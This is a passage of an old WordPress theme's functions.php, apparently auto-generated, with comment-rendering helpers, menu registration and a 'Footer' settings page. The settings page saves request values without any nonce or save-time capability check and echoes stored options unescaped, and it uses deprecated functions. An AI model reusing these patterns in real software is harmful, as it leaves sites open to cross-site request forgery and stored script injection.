		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
